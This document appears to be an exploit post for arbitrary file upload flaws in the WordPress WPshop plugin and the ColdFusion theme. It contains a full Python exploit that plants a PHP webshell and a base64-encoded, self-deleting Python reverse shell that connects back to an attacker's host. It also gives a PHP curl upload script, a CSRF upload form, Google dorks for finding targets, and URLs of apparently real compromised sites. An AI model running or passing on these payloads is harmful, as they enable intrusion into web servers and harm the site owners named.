WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload

#-Title: WordPress WPshop eCommerce 1.3.9.5 Shell Upload

#-Author: g0blin
#-Lab : research[dot]g0blin[dot]co[dot]uk

#-Date: 2015-03-02

#-Link Download : wordpress. org/plugins/wpshop/

#-Google Dork: inurl:wp-content/themes/wpshop/

#-Tested on : Linux

#-Fixed in : 1.3.9.6

////////////////////////////////////////////////////////////////////////////////////////////

Information of Bug : 

CVSS Score : 6.4
CSSS Vector : CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope : remote
Authorization Required : None

When Vulnerable : Blank

Description : 

The script ‘includes/ajax.php’ allows execution of various actions by anonymous users. The action name is provided in the ‘elementCode’ parameter. One of these actions is named ‘ajaxUpload’. This function allows for upload of arbitrary files, due to lack of sanitation of user input.

Solution:

Update to version 1.3.9.6.

-- Proof Of Concept --

require : Python (file.py)

How To use :

Python Name-script.py http://web. com back_python (your-ip) 1337

- Example :

Python wpshop.py http://web. com back_python.php 192.168.2.116 1337

Script wpshop.py : 

#!/usr/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150427.1
# Licence: WTFPL - wtfpl.net
import requests
import sys
__version__ = "20150427.1"

def banner():
    print """\x1b[1;32m
██╗    ██╗██████╗ ███████╗██╗  ██╗ ██████╗ ██████╗ ██╗    ██╗███╗   ██╗
██║    ██║██╔══██╗██╔════╝██║  ██║██╔═████╗██╔══██╗██║    ██║████╗  ██║
██║ █╗ ██║██████╔╝███████╗███████║██║██╔██║██████╔╝██║ █╗ ██║██╔██╗ ██║
██║███╗██║██╔═══╝ ╚════██║██╔══██║████╔╝██║██╔═══╝ ██║███╗██║██║╚██╗██║
╚███╔███╔╝██║     ███████║██║  ██║╚██████╔╝██║     ╚███╔███╔╝██║ ╚████║
 ╚══╝╚══╝ ╚═╝     ╚══════╝╚═╝  ╚═╝ ╚═════╝ ╚═╝      ╚══╝╚══╝ ╚═╝  ╚═══╝
 Exploit for WPShop Ecommerce, WPVDB-7830 Version: %s\x1b[0m""" %(__version__)

def php_encoder(php):
    f = open(php, "r").read()
    f = f.replace("<?php", "")
    f = f.replace("?>", "")
    encoded = f.encode('base64')
    encoded = encoded.replace("\n", "")
    encoded = encoded.strip()
    code = "eval(base64_decode('%s'));" %(encoded)
    return code

def shell_upload(url):
    target_url = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
    try:
        print "\x1b[1;32m{+} Using target URL of: %s\x1b[0m" %(target_url)    
        r = requests.post(url=target_url, files={"wpshop_file":("test.php", "<?php @assert(filter_input(0,woot,516)); ?>")})
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
    if r.text:
        return r.text.strip()
    else:
        sys.exit("\x1b[1;31m{-} Something fucked up... Our shell was not uploaded :/\x1b[0m")


def spawn_backconnect(shell_url, payload, cb_host, cb_port):
    cookies = {'host': cb_host, 'port': cb_port}
    data = {'woot': payload}
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'}
    try:
        print "\x1b[1;32m{*} Sending our payload...\x1b[0m"
        r = requests.post(url=shell_url, data=data, headers=headers, verify=False, cookies=cookies)
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
    if r.text:
        print r.text

def pop_shell(target, code, cb_host, cb_port):
    shell_url = shell_upload(url=target)    
    print "\x1b[1;32m{+} Our shell is at: %s\x1b[0m" %(shell_url)
    try:
        print "\x1b[1;36m{*} Sending Backconnect to %s:%s...\x1b[0m" %(cb_host, cb_port)
        spawn_backconnect(shell_url=shell_url, payload=code, cb_host=cb_host, cb_port=cb_port)
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))

def main(args):
    banner()
    if len(args) != 5:
        sys.exit("use: %s http://host/wordpress_baseurl/ <payload.php> <cb_host> <cb_port>" %(args[0]))
    pop_shell(target=args[1], code=php_encoder(args[2]), cb_host=args[3], cb_port=args[4])

if __name__ == "__main__":
    main(args=sys.argv)

Script back_python.php : 

<?php
$cbhost = $_COOKIE['host'];
$cbport = $_COOKIE['port'];
echo "{+} Using ".$cbhost.":".$cbport." as callback...\n{+} Dropping shell...\n";
$shell = 
"IyEvdXNyL2Jpbi9weXRob24yCiMgY29kaW5nOiB1dGYtOAojIFNlbGYgRGVzdHJ1Y3RpbmcsIERhZW1vbmluZyBSZXZlcnNlIFBUWS4KIyBybSdzIHNlbGYgb24gcXVpdCA6MwojIFRPRE86CiMgMTogQWRkIGNyeXB0bwojIDI6IEFkZCBwcm9jbmFtZSBzcG9vZgppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcHR5CmltcG9ydCBzb2NrZXQKaW1wb3J0IGNvbW1hbmRzCgpzaGVsbG1zZyA9ICJceDFiWzBtXHgxYlsxOzM2bUdvdCByb290IHlldD9ceDFiWzBtXHJcbiIgIyBuZWVkeiBhc2NpaQoKZGVmIHF1aXR0ZXIobXNnKToKICAgIHByaW50IG1zZwogICAgb3MudW5saW5rKG9zLnBhdGguYWJzcGF0aChfX2ZpbGVfXykpICMgdW5jb21tZW50IGZvciBnb2dvc2VsZmRlc3RydWN0CiAgICBzeXMuZXhpdCgwKQoKZGVmIHJldmVyc2UoY2Job3N0LCBjYnBvcnQpOgogICAgdHJ5OgogICAgICAgIHVuYW1lID0gY29tbWFuZHMuZ2V0b3V0cHV0KCJ1bmFtZSAtYSIpCiAgICAgICAgaWQgPSBjb21tYW5kcy5nZXRvdXRwdXQoImlkIikKICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgcXVpdHRlcignZ3JhYiB1bmFtZS9pZCBmYWlsJykKICAgIHRyeToKICAgICAgICBzb2NrID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgIHNvY2suY29ubmVjdCgoY2Job3N0LCBpbnQoY2Jwb3J0KSkpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGNvbm5lY3Rpb24gZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAwKQogICAgICAgIG9zLmR1cDIoc29jay5maWxlbm8oKSwgMSkKICAgICAgICBvcy5kdXAyKHNvY2suZmlsZW5vKCksIDIpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGR1cDIgZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MucHV0ZW52KCJISVNURklMRSIsICIvZGV2L251bGwiKQogICAgICAgIG9zLnB1dGVudigiUEFUSCIsICcvdXNyL2xvY2FsL3NiaW46L3Vzci9zYmluOi9zYmluOi9iaW46L3Vzci9sb2NhbC9iaW46L3Vzci9iaW4nKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHV0ZW52IGZhaWwnKQogICAgdHJ5OgogICAgICAgIHNvY2suc2VuZChzaGVsbG1zZykKICAgICAgICBzb2NrLnNlbmQoJ1x4MWJbMTszMm0nK3VuYW1lKyJcclxuIitpZCsiXHgxYlswbVxyXG4iKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdzZW5kIGlkL3VuYW1lIGZ1Y2t1cCcpCiAgICB0cnk6CiAgICAgICAgcHR5LnNwYXduKCcvYmluL2Jhc2gnKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHR5IHNwYXduIGZhaWwnKQogICAgcXVpdHRlcigncXVpdHRpbmcsIGNsZWFudXAnKQoKZGVmIG1haW4oYXJncyk6CiAgICBpZiBvcy5mb3JrKCkgPiAwOiAKICAgICAgICBvcy5fZXhpdCgwKQogICAgcmV2ZXJzZShzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgbWFpbihzeXMuYXJndikK";
$x = fopen("/tmp/x", "w+");
fwrite($x, base64_decode($shell));
fclose($x);
echo "{+} Shell dropped... Triggering...\n";
system("python /tmp/x ".$cbhost." ".$cbport);
die('{+} got shell?'); // payload should have rm'd itself
?>

Result Shell : Here !!

WordPress theme ColdFusion Arbitrary File Upload Vulnerability

#-Title: WordPress theme ColdFusion Arbitrary File Upload Vulnerability

#-Author: Smail Max / Bet0

#-Date: 10/31/2013

#- Vendor : themeforest. net

#- Link Download : themeforest. net/item/coldfusion-responsive-fullscreen-video-image-audio/4381748

#-Google Dork: inurl:wp-content/themes/ColdFusion

#- Tested on : Win7, Linux

#- Fixed in ??

////////////////////////////////////////////////////////////////////////////////////////////

Information of Bug : 

Bugtraq ID: 63523

Class: Input Validation Error

CVE: -

Remote: Yes

Local: No

Published: Nov 01 2013 12:00AM

Updated: Nov 01 2013 12:00AM

Credit: Bet0

When Vulnerable: {"status":"NOK", "ERR":"This file is incorect"}

Description : 

The ColdFusion Theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. 

An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.

Solution:

Currently, we are not aware of any vendor-supplied patches.

-- Proof Of Concept --

With Remote Code :

<?php

$uploadfile="3xploi7.php";

$ch = curl_init("http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");

curl_setopt($ch, CURLOPT_POST, true); 

curl_setopt($ch, CURLOPT_POSTFIELDS,

        array('Filedata'=>"@$uploadfile"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

?>

With CSRF :

<form

action="http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php" method="post" enctype="multipart/form-data">

<label for="file">Filename:</label>

<input type="file" name="Filedata" ><br>

<input type="submit" name="submit" value="3xploi7ed !">

</form>

If Succesfully (with CSRF) : 

Shell Path : Here

Site Demo (Infected) :

http://www.laughinXgcowproductions.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php

http://www.alias-phXoto.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php

http://www.manueXl-portela.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php